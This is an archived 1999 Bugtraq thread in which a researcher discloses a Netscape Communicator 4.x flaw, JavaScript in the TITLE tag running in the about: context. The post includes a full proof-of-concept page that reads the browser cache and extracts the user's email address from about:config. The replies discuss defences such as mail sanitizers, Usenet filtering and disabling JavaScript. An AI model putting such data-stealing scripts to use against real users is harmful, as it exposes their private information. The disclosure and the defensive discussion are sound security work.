Date: Mon, 24 May 1999 14:24:13 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator JavaScript in <TITLE> security vulnerability

There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux
(guess all 4.x versions are affected) in the way they treat JavaScript
code in the title of the document.

One may embed JavaScript code in the <TITLE> tag. If the info about the
document is shown, then the JavaScript code is executed. The info about the
document may be invoked by a script using 'location="wysiwyg://1/about:document" '.

The problem is that the JavaScript code is executed in the security context
of the "about:" protocol. This allows accessing documents in the "about:"
protocol such as: "about:cache", "about:config", "about:global", etc.

Vulnerabilities:
 * Reading user's cache and accessing information such as passwords,
credit card numbers.
 * Reading info about the Netscape's configuration ("about:config").
This includes finding user's email address, mail servers, the encoded mail password
  (it must be saved and may be decoded). This allows reading user's email.

The more dangerous part is that this vulnerability MAY BE EXPLOITED
USING HTML MAIL MESSAGE.


Workaround: Disable JavaScript

Demonstration is available at: http://www.nat.bg/~joro/titlecache.html

Georgi Guninski
 http://www.nat.bg/~joro
 http://www.whitehats.com/guninski

----------------------------------------------------------------------------------------

<http://www.nat.bg/~joro/titlecache.html>

<HTML>
<HEAD>
<TITLE>
<SCRIPT>

a=window.open('wysiwyg://1/about:cache');
s='Here are some links in your cache: \n';
for(i=0;i<7;i++)
 s += a.document.links[i] + '\n'; 
a.close();
alert(s);


a=window.open('wysiwyg://1/about:config');

mag='mail.identity.useremail = ';
mend='general.title_tips';
res=mag;
charstoread=20;

alert('Will try to find your email. May take some time.');

function readit() {
for(i=0;i<charstoread;i++) {
 t=res;
 a.find(mend);
 for(c=1;c<256;c++) {
   t=res + String.fromCharCode(c);

     if (a.find(t,true,true)) {
/*      alert(c); */
      res=t;
     } 
 }
}
res=res.substring(mag.length);
a.close();
alert("Your email is :\n" + res);
}

setTimeout("readit()",3000);
</SCRIPT>
</TITLE>
</HEAD>

<body>

There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux
(guess all 4.x versions are affected) in the way they treat JavaScript
code in the title of the document.
<p>One may embed JavaScript code in the TITLE tag. If the info about
the document
<br>is shown, then the JavaScript code is executed. The info about the
document may be invoked by a script using 'location="wysiwyg://1/about:document"'.
<p>The problem is that the JavaScript code is executed in the security
context of the "about:" protocol. This allows accessing documents in the
"about:" protocol such as: "about:cache", "about:config", "about:global",
etc.
<p>Vulnerabilities:
<br>&nbsp;* Reading user's cache and accessing information such as passwords,
credit card numbers.
<br>&nbsp;* Reading info about the Netscape's configuration ("about:config").
This includes finding user's email address, mail servers, the encoded
mail password (it must be saved and may be decoded). This allows
reading user's email.
<br>
The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.
<br>


<p>Workaround: Disable JavaScript
<br>
<a href="index.html">Go to Georgi Guninski's home page</a>
<br>
<br>

<SCRIPT>
location="wysiwyg://1/about:document";
</SCRIPT>


</body>
</HTML>

----------------------------------------------------------------------------------------

Date: Mon, 24 May 1999 10:23:06 -0700
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability

On Mon, 24 May 1999, Georgi Guninski wrote:

> Vulnerabilities:
>  * Reading user's cache and accessing information such as passwords,
> credit card numbers.
>  * Reading info about the Netscape's configuration ("about:config").
> This includes finding user's email address, mail servers, the
> encoded mail password (it must be saved and may be decoded). This
> allows reading user's email.
>
> The more dangerous part is that this vulnerability MAY BE EXPLOITED
> USING HTML MAIL MESSAGE.

...unless you're sanitizing your email. Anybody using an HTML-enabled
mail client should at least be aware of the availability of this tool:

  ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html

--
 John Hardin KA7OHZ                               jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  In the Lion
  the Mighty Lion
  the Zebra sleeps tonight...
  Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
   9 days until Crusade: the Babylon Project

----------------------------------------------------------------------------------------

Date: Tue, 25 May 1999 12:30:52 -0600
From: Brett Glass <brett@LARIAT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability

John's recipes are great tools; we recommend them. Only one problem:
Procmail does not work on NetNews. (If this exploit works in mail it
almost certainly works in news.... Scary thought.)

--Brett Glass

At 10:23 AM 5/24/99 -0700, John D. Hardin wrote:
>On Mon, 24 May 1999, Georgi Guninski wrote:
>
> > Vulnerabilities:
> >  * Reading user's cache and accessing information such as passwords,
> > credit card numbers.
> >  * Reading info about the Netscape's configuration ("about:config").
> > This includes finding user's email address, mail servers, the
> > encoded mail password (it must be saved and may be decoded). This
> > allows reading user's email.
> >
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED
> > USING HTML MAIL MESSAGE.
>
>...unless you're sanitizing your email. Anybody using an HTML-enabled
>mail client should at least be aware of the availability of this tool:
>
>   ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
>
>--
>  John Hardin KA7OHZ                               jhardin@wolfenet.com
>  pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
>  PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
>-----------------------------------------------------------------------
>   In the Lion
>   the Mighty Lion
>   the Zebra sleeps tonight...
>   Dee de-ee-ee-ee-ee de de de we um umma way!
>-----------------------------------------------------------------------
>    9 days until Crusade: the Babylon Project

----------------------------------------------------------------------------------------

Date: Tue, 25 May 1999 21:40:43 -0400
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security

> John's recipes are great tools; we recommend them. Only one problem:
> Procmail does not work on NetNews. (If this exploit works in mail it
> almost certainly works in news.... Scary thought.)
>
> --Brett Glass
>

I don't know if the exploit works with Usenet messages, but
decent Usenet servers have filtering capabilities.

INN had perl filtering hooks since at least 1995,
and had easily modified code to analyze and reject
messages based on headers since the beginning (1993.)

In Usenet, generally most sites do not modify
and sanitize messages, they just drop and reject them
with just a message to the log, nothing else.  Since
propagating modified messages, for whatever reason, is
never acceptable, it becomes a problem to sanitize:
it would mean keeping additional special copies around.

A full Usenet feed is on the order of 1E6 messages
per day, and nearly all are binaries (UUEncoded). The John D.
Hardin code looks solid, but might bog down a server
if every Usenet message had to go through it.

Personally, I don't think HTML (or binaries) belong
on Usenet in the first place, so it's a simple policy
to just drop posts containing HTML or UUencoding.  :-)

Seriously, the Hardin perl code will drop pretty easily
into INN, although I haven't tried it myself.
See README.perl_hook in the INN distribution and
modify the procmail selector lines to the appropriate
perl instead, and return a reject code instead of
mangling and rewriting.

Forrest J. Cavalier III, Mib Software, INN customization and
consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages:
   http://www.mibsoftware.com/innsup.htm

----------------------------------------------------------------------------------------

Date: Tue, 25 May 1999 22:32:25 -0400
From: Usman <akeju00@IONAPREP.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability

"John D. Hardin" wrote:
>
> On Mon, 24 May 1999, Georgi Guninski wrote:
>>snip!<<
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED
> > USING HTML MAIL MESSAGE.
>
> ...unless you're sanitizing your email. Anybody using an HTML-enabled
> mail client should at least be aware of the availability of this tool:
>
>   ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
>
> --
>  John Hardin KA7OHZ                               jhardin@wolfenet.com


Or, just to add the said workaround, if you're only worried about email,
Netscape 4.5+ users can just disable JavaScript for Mail and News without
disabling JavaScript altogether. I know there's still the meta refresh factor
for HTML-enabled mail clients, though. It would be, IMHO, a good idea for
Netscape to add a little "Disable/Enable HTML for Mail Messages" checkbox, don't
you think?

-Usman Akeju

----------------------------------------------------------------------------------------

Date: Sat, 12 Jun 1999 22:58:26 -0700
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security

On Thu, 27 May 1999, Aleph One wrote:

> That doesn't really cut it. You can embed JavaScript into things
> like onClick, onLoad, etc. You need to kill all those as well.

Thanks for pointing that out. I've updated the sanitizer to defang the
event handlers explicitly, which saves blocking the <BODY> and <TITLE>
tags themselves, and also protects links.

The current release of the sanitizer is 1.84 and it is available at
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html

--
 John Hardin KA7OHZ                               jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  Efficiency can magnify good, but it magnifies evil just as well.
  So, we should not be surprised to find that modern electronic
  communication magnifies stupidity as *efficiently* as it magnifies
  intelligence.
                                  -- Robert A. Matern
-----------------------------------------------------------------------
   89 days until 9/9/99